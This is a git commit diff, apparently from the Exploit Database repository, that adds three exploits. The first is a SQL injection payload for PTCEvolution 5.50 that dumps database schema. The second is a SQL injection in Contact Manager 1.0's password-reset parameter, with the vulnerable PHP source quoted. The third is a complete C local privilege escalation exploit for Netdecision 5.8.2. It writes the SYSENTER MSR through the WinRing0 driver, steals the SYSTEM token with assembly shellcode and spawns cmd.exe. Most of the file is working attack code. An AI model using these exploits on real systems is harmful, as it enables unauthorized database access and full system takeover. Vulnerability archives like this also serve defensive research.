DB: 2017-09-18
3 new exploits Netdecision 5.8.2 - Local Privilege Escalation PTCEvolution 5.50 - SQL Injection Contact Manager 1.0 - 'femail' Parameter SQL Injection
This commit is contained in:
parent
db8b5bc2fe
commit
bc6f82924c
4 changed files with 395 additions and 0 deletions
|
@ -9236,6 +9236,7 @@ id,file,description,date,author,platform,type,port
|
|||
42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
|
||||
42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0
|
||||
42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
|
||||
42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -38511,3 +38512,5 @@ id,file,description,date,author,platform,type,port
|
|||
42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0
|
||||
42730,platforms/hardware/webapps/42730.py,"D-Link DIR8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps,0
|
||||
42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0
|
||||
42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
|
||||
42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
28
platforms/php/webapps/42733.txt
Executable file
28
platforms/php/webapps/42733.txt
Executable file
|
@ -0,0 +1,28 @@
|
|||
# # # # #
|
||||
# Exploit Title: PTCEvolution 5.50 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 15.09.2017
|
||||
# Vendor Homepage: http://ptcevolution.com/
|
||||
# Software Link: http://www.ptcevolution.com/demoo/
|
||||
# Demo: http://demo.ptcevolution.com/
|
||||
# Version: 5.50
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?view=product&id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?view=products&id=[SQL]
|
||||
#
|
||||
# -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
51
platforms/php/webapps/42734.txt
Executable file
51
platforms/php/webapps/42734.txt
Executable file
|
@ -0,0 +1,51 @@
|
|||
# # # # #
|
||||
# Exploit Title: Contact Manager 1.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 15.09.2017
|
||||
# Vendor Homepage: http://savsofteproducts.com/
|
||||
# Software Link: http://www.contactmanagerscript.com/download/contact_manager_1380185909.zip
|
||||
# Demo: http://contactmanagerscript.com/demo/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Vulnerable Source:
|
||||
#
|
||||
# .............
|
||||
# <a href="login.php?forgot=1">Forgot Password ?</a>
|
||||
# <?php
|
||||
# if(isset($_REQUEST["forgot"])){
|
||||
# if($_REQUEST["forgot"]=="2"){
|
||||
# $result=mysql_query("select * from co_setting where Email='$_REQUEST[femail]' ");
|
||||
# $count=mysql_num_rows($result);
|
||||
# if($count==1)
|
||||
#
|
||||
# {
|
||||
#
|
||||
# $npass=rand("5556","99999");
|
||||
#
|
||||
# $to = $row['femail'];
|
||||
# $subject = "Password Reset";
|
||||
# $message = "New Primary Password is: $npass \r\n";
|
||||
# $headers = "From: $Email";
|
||||
#
|
||||
# $npass=md5($npass);
|
||||
#
|
||||
# $query="update co_setting set Password='$npass' where Email='$_REQUEST[femail]'";
|
||||
# mysql_query($query);
|
||||
# .............
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/login.php?forgot=2&femail=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
313
platforms/windows/local/42735.c
Executable file
313
platforms/windows/local/42735.c
Executable file
|
@ -0,0 +1,313 @@
|
|||
// Netdecision.cpp : Defines the entry point for the console application.
|
||||
/*
|
||||
# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys
|
||||
# Date: 2017.09.17
|
||||
# Exploit Author: Peter Baris
|
||||
# Vendor Homepage: www.netmechanica.com
|
||||
# Software Link: http://www.netmechanica.com/downloads/ //registration required
|
||||
# Version: 5.8.2
|
||||
# Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1
|
||||
# CVE : CVE-2017-14311
|
||||
|
||||
Vendor notified on 2017.09.11 - no response */
|
||||
|
||||
#include "stdafx.h"
|
||||
#include <stdio.h>
|
||||
#include <Windows.h>
|
||||
#include <winioctl.h>
|
||||
#include <tlhelp32.h>
|
||||
#include <Psapi.h>
|
||||
|
||||
#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0"
|
||||
|
||||
|
||||
|
||||
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
|
||||
HANDLE GetDeviceHandle(LPCTSTR FileName) {
|
||||
HANDLE hFile = NULL;
|
||||
|
||||
hFile = CreateFile(FileName,
|
||||
GENERIC_READ | GENERIC_WRITE,
|
||||
0,
|
||||
0,
|
||||
OPEN_EXISTING,
|
||||
NULL,
|
||||
0);
|
||||
|
||||
return hFile;
|
||||
}
|
||||
|
||||
|
||||
extern ULONG ZwYieldExecution = NULL;
|
||||
extern PVOID KernelBaseAddressInKernelMode = NULL;
|
||||
extern HMODULE hKernelInUserMode = NULL;
|
||||
|
||||
VOID GetKiFastSystemCall() {
|
||||
|
||||
SIZE_T ReturnLength;
|
||||
HMODULE hntdll = NULL;
|
||||
|
||||
ULONG ZwYieldExecution_offset;
|
||||
|
||||
|
||||
hntdll = LoadLibraryA("ntdll.dll");
|
||||
|
||||
if (!hntdll) {
|
||||
printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
LPVOID drivers[1024];
|
||||
DWORD cbNeeded;
|
||||
|
||||
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
|
||||
KernelBaseAddressInKernelMode = drivers[0];
|
||||
|
||||
|
||||
printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode);
|
||||
|
||||
hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe");
|
||||
|
||||
if (!hKernelInUserMode) {
|
||||
printf("[-] Failed to load kernel: 0x%X\n", GetLastError());
|
||||
exit;
|
||||
}
|
||||
|
||||
|
||||
printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode);
|
||||
|
||||
|
||||
|
||||
|
||||
ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution");
|
||||
|
||||
if (!ZwYieldExecution) {
|
||||
printf("[-] Failed to resolve KiFastSystemCall: 0x%X\n", GetLastError());
|
||||
exit;
|
||||
}
|
||||
|
||||
ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode;
|
||||
printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset);
|
||||
|
||||
|
||||
(ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode;
|
||||
|
||||
printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution);
|
||||
|
||||
|
||||
if (hntdll) {
|
||||
FreeLibrary(hntdll);
|
||||
}
|
||||
|
||||
if (hKernelInUserMode) {
|
||||
FreeLibrary(hKernelInUserMode);
|
||||
}
|
||||
|
||||
hntdll = NULL;
|
||||
|
||||
return hKernelInUserMode;
|
||||
return ZwYieldExecution;
|
||||
}
|
||||
|
||||
|
||||
extern ULONG eip = NULL;
|
||||
extern ULONG pesp = NULL;
|
||||
extern ULONG pebp = NULL;
|
||||
extern ULONG ETHREAD = NULL;
|
||||
|
||||
ULONG Shellcode() {
|
||||
|
||||
ULONG FunctionAddress = ZwYieldExecution;
|
||||
|
||||
__asm {
|
||||
|
||||
pushad
|
||||
pushfd
|
||||
xor eax,eax
|
||||
|
||||
mov edi, FunctionAddress ; Address of ZwYieldExection to EDI
|
||||
|
||||
SearchCall:
|
||||
mov eax, 0xe8
|
||||
scasb
|
||||
jnz SearchCall
|
||||
|
||||
mov ebx, edi
|
||||
mov ecx, [edi]
|
||||
add ebx, ecx; EBX points to KiSystemService
|
||||
add ebx, 0x4
|
||||
|
||||
lea edi, [ebx - 0x1]
|
||||
SearchFastCallEntry:
|
||||
mov eax, 0x00000023
|
||||
scasd
|
||||
jnz SearchFastCallEntry
|
||||
mov eax, 0xa10f306a
|
||||
scasd
|
||||
jnz SearchFastCallEntry
|
||||
|
||||
lea eax,[edi-0x9]
|
||||
xor edx, edx
|
||||
mov ecx, 0x176
|
||||
|
||||
|
||||
wrmsr
|
||||
popfd
|
||||
popad
|
||||
|
||||
|
||||
mov eax,ETHREAD
|
||||
|
||||
mov eax,[eax]
|
||||
mov eax, [eax+0x050]
|
||||
mov ecx, eax
|
||||
mov edx, 0x4
|
||||
|
||||
FindSystemProcess :
|
||||
mov eax, [eax + 0x0B8]
|
||||
sub eax, 0x0B8
|
||||
cmp[eax + 0x0B4], edx
|
||||
jne FindSystemProcess
|
||||
|
||||
|
||||
mov edx, [eax + 0x0F8]
|
||||
mov[ecx + 0x0F8], edx
|
||||
|
||||
;xor eax, eax
|
||||
mov esp,pesp
|
||||
mov ebp,pebp
|
||||
|
||||
push eip
|
||||
; int 3
|
||||
ret
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
HANDLE hlib = NULL;
|
||||
HANDLE hFile = NULL;
|
||||
PVOID lpInBuffer = NULL;
|
||||
ULONG lpOutBuffer = NULL;
|
||||
ULONG lpBytesReturned;
|
||||
PVOID BuffAddress = NULL;
|
||||
SIZE_T BufferSize = 0x1000;
|
||||
SIZE_T nOutBufferSize = 0x800;
|
||||
ULONG Interval = 0;
|
||||
ULONG Shell = &Shellcode;
|
||||
NTSTATUS NtStatus = NULL;
|
||||
|
||||
|
||||
|
||||
/* Undocumented feature to trigger the vulnerability */
|
||||
hlib = LoadLibraryA("ntdll.dll");
|
||||
|
||||
if (!hlib) {
|
||||
printf("[-] Failed to load the library: 0x%X\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
||||
GetKiFastSystemCall();
|
||||
|
||||
/* Allocate memory for our input and output buffers */
|
||||
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
|
||||
/*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/
|
||||
|
||||
|
||||
lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
//printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer);
|
||||
|
||||
|
||||
/* Crafting the input buffer */
|
||||
|
||||
BuffAddress = (PVOID)(((ULONG)lpInBuffer));
|
||||
*(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/
|
||||
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4));
|
||||
*(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/
|
||||
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8));
|
||||
*(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */
|
||||
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc));
|
||||
*(PULONG)BuffAddress = (ULONG)0x00000000;
|
||||
|
||||
|
||||
//RtlFillMemory(lpInBuffer, BufferSize, 0x41);
|
||||
//RtlFillMemory(lpOutBuffer, BufferSize, 0x42);
|
||||
|
||||
|
||||
//printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n");
|
||||
|
||||
hFile = GetDeviceHandle(FileName);
|
||||
|
||||
if (hFile == INVALID_HANDLE_VALUE) {
|
||||
printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError());
|
||||
return 1;
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n");
|
||||
}
|
||||
|
||||
/*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/
|
||||
|
||||
(HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/
|
||||
printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip);
|
||||
(HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/
|
||||
printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip);
|
||||
|
||||
/*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/
|
||||
DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/
|
||||
|
||||
ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i);
|
||||
|
||||
printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i);
|
||||
if (affinity == NULL) {
|
||||
|
||||
printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError());
|
||||
exit(1);
|
||||
}
|
||||
|
||||
ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/
|
||||
|
||||
/*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */
|
||||
|
||||
__asm {
|
||||
|
||||
mov pesp, esp
|
||||
mov pebp, ebp
|
||||
nop
|
||||
}
|
||||
|
||||
|
||||
DeviceIoControl(hFile,
|
||||
0x9C402088,
|
||||
lpInBuffer,
|
||||
0x10,
|
||||
lpOutBuffer,
|
||||
0x20,
|
||||
&lpBytesReturned,
|
||||
NULL);
|
||||
|
||||
|
||||
|
||||
STARTUPINFO info = { sizeof(info) };
|
||||
PROCESS_INFORMATION processInfo;
|
||||
NTSTATUS proc;
|
||||
LPCSTR command = L"C:\\Windows\\System32\\cmd.exe";
|
||||
proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo);
|
||||
|
||||
if (!proc) {
|
||||
|
||||
printf("ERROR 0x%X\r\n", proc);
|
||||
}
|
||||
WaitForSingleObject(processInfo.hProcess, INFINITE);
|
||||
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
Loading…
Add table
Reference in a new issue